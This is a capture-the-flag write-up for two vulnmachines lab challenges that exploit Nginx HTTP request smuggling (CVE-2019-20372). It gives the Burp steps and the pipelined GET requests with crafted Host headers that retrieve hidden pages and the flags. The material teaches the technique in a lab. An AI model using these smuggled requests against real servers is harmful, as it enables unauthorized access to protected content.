HTTP Request Smuggling write-up vulnmachines
What is HTTP Request Smuggling?
Nginx HTTP request smuggling: CVE-2019–20372 Nginx before 1.17.7, with certain error_page configurations, allows HTTP request smuggling, as demonstrated by the ability of an attacker to read unauthorized web pages in environments where Nginx is being fronted by a load balancer.
Question:
Capture the flag leveraging the HTTP Request Smuggling vulnerability.
Challenge 1 : HTTP Request Smuggling Lab.
Challenge 2 : Inside Hacker Lab.
Solution:
Step 1: Visit vulnmachines.com
Step 2: Go to Mission -> Game -> Mission. Select ‘HTTP Request Smuggling’.
Step 3: You will be redirected to the below page at http://example.org
Step 4: As per the hint given, capture the first request (hackme3.vulnmachines.com:9015) in Burp.
Capture request in Burp and see the response.
Step 5: It is redirecting to example.org as we have mentioned below in the hint: (See hidden configuration in the _hidden folder).
Change connection to keep-alive
GET /index.html HTTP/1.1
Host: vnmlocalhost
Step 6: As per the hint, request the file /__hidden/index.html in the same request.
GET /__hidden/index.html HTTP/1.1
Host: vnmlocalhost
GET /_hidden/index.html HTTP/1.1
Host: nolocalhost
Flag: vnm{Hidden Data Exposed Successfully!}
Challenge 2 : HTTP Request Smuggling Challenge: ‘Inside Hacker’
Step 1: Click on Lab Access.
Step 2: You will be redirected to the below page at https://www.twitter.com/vulnmachines
Step 3: As per the hint given, capture the first request (http://13.127.193.78:9015/) in Burp
Captured request in Burp and see the response.
Step 4: It is redirecting to twitter.com/vulnmachines, as we have mentioned in the hint: (See hidden configuration in the _hidden folder).
Change connection to keep-alive
GET /index.html HTTP/1.1
Host: vnmlocalhost
Step 5: As per the hint, request the file /__hidden/index.html in the same request.
GET /_hidden/index.html HTTP/1.1
Host: vnmlocalhost
Flag: vnm{BuT W3 Are HaCkers YoU and You Are ExpoSed}
Reference: